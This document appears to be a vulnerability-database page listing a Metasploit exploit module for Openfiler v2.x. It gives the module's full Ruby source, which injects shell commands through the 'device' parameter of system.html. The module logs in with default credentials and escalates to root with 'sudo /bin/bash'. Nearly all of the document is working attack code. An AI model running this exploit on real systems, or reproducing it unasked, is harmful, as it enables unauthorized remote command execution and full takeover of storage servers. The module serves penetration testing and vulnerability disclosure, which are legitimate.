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Openfiler v2.x NetworkCard Command Execution

🗓️ 10 Sep 2012 00:00:00Reported by metasploitType 
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Openfiler v2.x NetworkCard Command Execution. Allows authenticated users to execute arbitrary code under the context of the 'openfiler' user by abusing a vulnerability in Openfiler v2.x. The 'system.html' file uses user controlled data from the 'device' parameter to create a new 'NetworkCard' object. The 'openfiler' user may 'sudo /bin/bash' without providing a system password

Code
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info={})
        super(update_info(info,
            'Name'           => "Openfiler v2.x NetworkCard Command Execution",
            'Description'    => %q{
                This module exploits a vulnerability in Openfiler v2.x
                which could be abused to allow authenticated users to execute arbitrary
                code under the context of the 'openfiler' user. The 'system.html' file
                uses user controlled data from the 'device' parameter to create a new
                'NetworkCard' object. The class constructor in 'network.inc' calls exec()
                with the supplied data. The 'openfiler' user may 'sudo /bin/bash' without
                providing a system password.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit
                ],
            'References'     =>
                [
                    ['URL', 'http://itsecuritysolutions.org/2012-09-06-Openfiler-v2.x-multiple-vulnerabilities/']
                    #['OSVDB', ''],
                    #['EDB',   ''],
                ],
            'DefaultOptions'  =>
                {
                    'ExitFunction' => 'none'
                },
            'Platform'       => 'unix',
            'Arch'           => ARCH_CMD,
            'Payload'        =>
                {
                    'Space'       => 1024,
                    'BadChars'    => "\x00",
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd',
                            'RequiredCmd' => 'generic telnet python perl bash',
                        }
                },
            'Targets'        =>
                [
                    ['Automatic Targeting', { 'auto' => true }]
                ],
            'Privileged'     => false,
            'DisclosureDate' => "Sep 04 2012",
            'DefaultTarget'  => 0))
 
        register_options(
            [
                Opt::RPORT(446),
                OptBool.new('SSL', [true, 'Use SSL', true]),
                OptString.new('USERNAME', [true, 'The username for the application', 'openfiler']),
                OptString.new('PASSWORD', [true, 'The password for the application', 'password'])
            ], self.class)
    end
 
    def check
 
        @peer = "#{rhost}:#{rport}"
 
        # retrieve software version from login page
        print_status("#{@peer} - Sending check")
        begin
            res = send_request_cgi({
                'uri' => '/'
            })
 
            if    res and res.code == 200 and res.body =~ /<strong>Distro Release:&nbps;<\/strong>Openfiler [NE]SA 2\./
                return Exploit::CheckCode::Appears
            elsif res and res.code == 200 and res.body =~ /<title>Openfiler Storage Control Center<\/title>/
                return Exploit::CheckCode::Detected
            end
 
        rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
            print_error("#{@peer} - Connection failed")
        end
        return Exploit::CheckCode::Unknown
 
    end
 
    def on_new_session(client)
        client.shell_command_token("sudo /bin/bash")
    end
 
 
    def exploit
 
        @peer = "#{rhost}:#{rport}"
        user  = datastore['USERNAME']
        pass  = datastore['PASSWORD']
        cmd   = Rex::Text.uri_encode("&#{payload.raw}&")
 
        # send payload
        print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)")
        begin
            res = send_request_cgi({
                'uri'    => "/admin/system.html?step=2&device=lo#{cmd}",
                'cookie' => "usercookie=#{user}; passcookie=#{pass};",
            }, 25)
        rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
            fail_with(Exploit::Failure::Unknown, 'Connection failed')
        end
 
        if    res and res.code == 200 and res.body =~ /<title>System : Network Setup<\/title>/
            print_good("#{@peer} - Payload sent successfully")
        elsif res and res.code == 302 and res.headers['Location'] =~ /\/index\.html\?redirect/
            fail_with(Exploit::Failure::NoAccess, 'Authentication failed')
        else
            fail_with(Exploit::Failure::Unknown, 'Sending payload failed')
        end
 
    end
end



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